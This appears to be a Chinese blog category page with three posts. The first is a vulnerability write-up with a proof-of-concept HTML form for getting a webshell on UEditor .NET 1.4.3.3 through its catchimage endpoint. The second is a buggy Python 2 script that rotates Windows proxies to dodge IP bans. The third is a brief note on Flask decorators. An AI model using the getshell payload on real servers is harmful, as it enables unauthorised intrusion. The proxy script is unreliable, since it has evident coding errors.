MENU

分类 默认分类 下的文章

UEditor .net 1.4.3.3版本 getshell

发布时间:2018-08-03
公开时间:2018-08-21
漏洞类型:逻辑漏洞
危害等级:高
漏洞编号:xianzhi-2018-08-16052905(不收取 驳回)
测试版本:github最新版
漏洞详情
https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.cs
Crawler方法对source[]的检查仅仅是一个ContentType

    if (response.ContentType.IndexOf("image") == -1)
{
State = "Url is not an image";
return this;
}

并没有检查文件扩展名就直接保存到本地 导致getshell
POC:

<form action="http://xx.com/editor/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">shell addr: <input name="source[]" type="text" />

<input type="submit" value="Submit" />

</form>

shell addr 可以用http://www.xxx.com/xxx.jpg?.aspx的方式使用包含木马的图片(为了使服务器返回的ContentType是image/xxx)
也可以用http://www.xxxx.com/xxx.php?.aspx然后在xxx.php中自己设置ContentType

返回如下

{"state":"SUCCESS","list":[{"state":"SUCCESS","source":"http://www.xxxx.com//upload/Encyclopedias/201808/03/2018080300550278683.png?.aspx","url":"/upload/image/201808/03/6366885698033038502306919.aspx"}]}

作者:索马里的乌贼
链接:https://www.jianshu.com/p/6dae608b617c

造轮子之使用python脚本自动切换代理IP

在有一次访问网站时候,网站动不动就把我的IP给ban了。我是又气愤又无助,然后脑子中突然想起来一个点子,如果我可以过了多长时间可以换了自己的IP,那岂不是美滋滋哦,然后我便上网查找资料,在网山看到的大部分都是用脚本在请求过程中加上代理参数,也有一小部分是我要的这种效果,我的想法是切换代理不是用脚本请求而是直接去修改windows本地代理实现这样的效果,HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings,这个是windows代理的注册表,而刚好python中的_winreg模块可以操作注册表,这样子就方便多了,通过python爬去网页IP代理然后验证可以用的加入列表,然后每隔多长时间去设置一下代理,我又不会python,就找了很多例子造了个轮子,代码如下:

#!/usr/bin/python
# -*- coding:utf-8 -*-
import os, sys, re,requests,urllib2,time
#可以自行设置请求头
User_Agent = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'  
header = {}  
header['User-Agent'] = User_Agent 

#定义获取代理函数(网上免费版,吐槽QVQ)
def getfreeProxyIp():  
 proxy = []  
 for i in range(10):  
  try:  
   url = 'http://www.xicidaili.com/nn/'+str(i)  
   req = urllib2.Request(url,headers=header)  
   res = urllib2.urlopen(req).read()
   soup = BeautifulSoup(res,"html.parser")  
   ips = soup.findAll('tr')  
   for x in range(1,len(ips)):  
    ip = ips[x]  
    tds = ip.findAll("td")  
    ip_temp = tds[1].contents[0]+":"+tds[2].contents[0]  
    proxy.append(ip_temp)
  except:  
   continue  
 return  proxy

# 定义获取代理函数(scylla版本,至少我找到了可以用的)
def getProxyIp():  
    url = 'http://192.168.110.128:8899/api/v1/proxies'
    r = requests.get(url).json()
    proxy = []
    try:
        for i in r["proxies"]:
            ip = str(i['ip'])+":"+str(i['port'])
            proxy.append(ip)
    except:  
        pass 
    return  proxy

# 定义验证函数,提取可用IP代理
def testProxys(proxys):
    """ Test the proxys. """
    validProxys = []
    Url = "http://ip.chinaz.com/getip.aspx"
    for proxy in proxys:
        try:
            # set proxy
            proxy_handler = urllib2.ProxyHandler({'http':proxy, 'https':proxy})
            opener = urllib2.build_opener(proxy_handler)
            urllib2.install_opener(opener)
            # request website
            response = urllib2.urlopen(Url, timeout=5).read()

            # set filtration condition according website
            if re.findall('{ip:.*?,address:..*?}', response) != []: # remove invalid proxy
                validProxys.append(proxy)
                print "%s\t%s" % (proxy)
        except Exception as e:
            continue

    return validProxys

#定义设置代理函数

def regIESettings(op, noLocal=False, ip='', pac=''):
  '''
    # 根据需求生成Windows代理设置注册表的.reg文件内容
    # DefaultConnectionSettings项是二进制项
  '''
  if not op : return
  # 如果是设置IP代理的模式 则检查IP地址的有效性(允许为空,但不允许格式错误)
  if 'Proxy' in op and not ip == '': 
    # if len(extractIp(ip))==0
    if 1 > len(re.findall('([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\s*:{0,1}\s*([0-9]{1,5}){0,1}',ip)) :
      print '---Unexpected IP Address:%s---'%ip
      return
  options = {'On':'0F','Off':'01','ProxyOnly':'03','PacOnly':'05','ProxyAndPac':'07','D':'09','DIP':'0B','DS':'0D'}
  if op == 'Off':
    reg_value = '46,00,00,00,00,00,00,00,01'
  else:
    switcher = options.get(op)
    if not switcher:
      print '\n---Unexpected Option. Please check the value after [-o]---\n'
      return
    skipLocal = '07,00,00,00,%s'%__toHex('<local>') if noLocal else '00'
    reg_value = '46,00,00,00,00,00,00,00,%(switcher)s,00,00,00,%(ipLen)s,00,00,00,%(ip)s00,00,00,%(skipLocal)s,21,00,00,00%(pac)s' % ({ 'switcher':switcher,'ipLen':__toHex(len(ip)),'ip':__toHex(ip)+',' if ip else '','infoLen':__toHex(len('<local>')),'skipLocal':skipLocal,'pac':','+__toHex(pac) if pac else '' })
  settings = 'Windows Registry Editor Version 5.00\n[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]\n"DefaultConnectionSettings"=hex:%s' % reg_value
  # print 'Using proxy address: %s' % ip
  # print op, ip, pac
  # print options[op] +'\n'+ __toHex(ip) +'\n'+ __toHex(pac)
  # print settings
  # === 生成reg文件并导入到注册表中 ===
  filePath = '%s\DefaultConnectionSettings.reg'%os.getcwd() 
  with open(filePath, 'w') as f:
    f.write( settings )
  cmd = 'reg import "%s"' %filePath
  result  = os.popen(cmd)
  if len(result.readlines()) < 2 :
    print ''
  return 

def __toHex(obj):
  if   obj == '': return ''
  elif obj == 0 or obj == '0' or obj == '00': return '00'
  if isinstance(obj, str):
    rehex = [str(hex(ord(s))).replace('0x','') for s in obj]
    return ','.join(rehex)
  elif isinstance(obj, int):
    num = str(hex(obj)).replace('0x', '')
    return num if len(num)>1 else '0'+num # 如果是一位数则自动补上0,7为07,e为0e

def main():

  print'''
    
 .oooooo..o                          .     .o                    
d8P'    `Y8                        .o8   o888                    
Y88bo.      oooo    ooo  .oooo.o .o888oo  888  ooo. .oo.  .oo.   
 `"Y8888o.   `88.  .8'  d88(  "8   888    888  `888P"Y88bP"Y88b  
     `"Y88b   `88..8'   `"Y88b.    888    888   888   888   888  
oo     .d8P    `888'    o.  )88b   888 .  888   888   888   888  
8""88888P'      .8'     8""888P'   "888" o888o o888o o888o o888o 
            .o..P'                                               
            `Y8P'                                               



  '''
  regIESettings(op='Off', ip='', pac='', noLocal=False)
  proxy = getProxyIp()
  validProxys = testProxys(proxy)
  print '---Start agent---'
  while True:
    for ip in validProxys:
        try:
            print 'Being used'+ip
            regIESettings(op='ProxyOnly', ip=ip, pac='', noLocal=False)
            time.sleep(20)
      except:
          print 'GG!'

if __name__ == '__main__': 
    main()
    

还会再改善的,加油

Flask中一些纠结与知识点

1.@修饰符
@app.route('/')
在在前面有一个@符号。那麽这个@符号是什么意思呢?
在查阅其他人的博客时候是这么写的:
'@' 用做函数的修饰符,可以在模块或者类的定义层内对函数进行修饰,
出现在函数定义的前一行,不允许和函数定义在同一行
一个修饰符就是一个函数,它将被修饰的函数作为参数,并返回修饰后的同名函数或其他可调用的东西。

def funA(a):

print 'funA'

def funB(b):

print 'funB'

@funA
@funB
def funC():

print 'funC'

result:

================================ RESTART ================================

funB
funA

则整个程序的执行过程就是funA(funB(funC))